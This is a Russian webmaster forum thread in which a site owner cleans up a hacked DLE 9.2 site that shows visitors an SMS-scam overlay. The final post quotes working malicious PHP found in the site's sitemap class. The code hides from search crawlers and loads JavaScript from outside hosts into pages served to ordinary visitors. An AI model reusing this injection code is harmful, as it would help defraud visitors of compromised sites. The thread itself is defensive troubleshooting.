- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Взломали сайт на DLE 9.2. При нажатии в любом месте страницы поверх сайта вылезает окно с текстом "Уважаемые посетители! В последнее время наш сайт регулярно стал подвергаться атакам со стороны ботов. Для предотвращения данной ситуации мы приняли решение ввести обязательную авторизацию для всех посетителей. Введите номер Вашего телефона, на него придет бесплатное смс сообщение с кодом авторизации.Данная процедура является абсолютно бесплатной! С Уважением, администрация сайта!" и с полем для ввода номера телефона. Ну короче развод на смс. Нашел шелл в движке - снес. Нашел изменения в файле main.tpl и admin.php - тоже убрал. Короче теперь окно не появляется на самом сайте. Зато появляется в админке при попытке например создать sitemap. Уже не знаю где искать! Помогите!
Если шелл удалили и просто не можете убрать последствия, тогда перезалейте файлы админки да и все.
Не помогает. Файл админки вызывает модули для разных функций, где то в них видимо есть еще код вредоносный
в шаблоне админке поищите, он в отдельной папке
И еще, как массово указать всем файлам и папкам права доступа 755 на папки и 644 на файлы? А то шелл всем выставил 777 и я замучался уже менять вручную права каждому файлику.
---------- Добавлено 14.05.2012 в 19:40 ----------
как называется шаблон админки? и в какой папке? в templates не нахожу
engine\skins\default.skin.php смотри
Права можно выставить в пенельке рекурсией, ispmanager может это, другие незнаю.
/engine/inc/include/init.php вот где еще код был, заменил файл нормальным и все путем стало. У меня на сервере как раз ISP стоит. Не скажете как там этой рекурсией права выставить?
/engine/inc/include/init.php вот где еще код был, заменил файл нормальным и все путем стало. У меня на сервере как раз ISP стоит. Не скажете как там этой рекурсией права выставить?
На сколько помню в этом файле код, похожий на вирусный, но там так закодирована лицензия, вы точно проверили, что сейчас все ок?
Было все в порядке. А к ночи стало интереснее. При любом действии в админке все очень тормозит и почему то отправляется запрос на сайт upgrade9.net не знаю что за сайт, вижу в Опере что туда запрос идет. Там сайт не отвечает и тогда уже работает мой сайт. Как узнать куда он там ломится и что именно посылает запрос?
Snurik, ну так скорее всего не всё вычистили. Да и шелл наверное у вас есть.
Айболит я так смотрю, вы запустить не смогли, хотите - киньте в личку фтп, посмотрю шеллы, может по пути и другое что интересное найду.
Шелл я уже удалил. И почистил где нашел. Думается придется весь движок перезаливать. Айболит запустил в папке engine. Он там много чего нашел даже не относящегося к вредоносному.
---------- Добавлено 15.05.2012 в 02:30 ----------
/engine/classes/sitemap.class.php там еще вредоносный код. там ссылки на пару адресов левых
<?php
if (!preg_match('/(accoona|ia_archiver|antabot|ask jeeves|baidu|eltaindexer|feedfetcher|
gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|
worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|
mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|
yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)/i',
$_SERVER['HTTP_USER_AGENT'])) {
$urlp = "http://all-php.ru/?i=42084&c=3";
$urlpurs="http://masvip.ru/2095/take.html";
$code = @file_get_contents($urlp);
$code2 = @file_get_contents($urlpurs);
$data = substr($code,strpos($code,'document'),(strpos($code,');')+2) - strpos
($code,'document'));
$data2 = substr($code2,strpos($code2,'><!--')+5,(strpos($code2,'\')')+2) - (strpos
($code2,'><!--')+5));
header('Content-Type: text/javascript; windows-1251');
echo $data;
echo $data2;
//echo $code2;
}
?>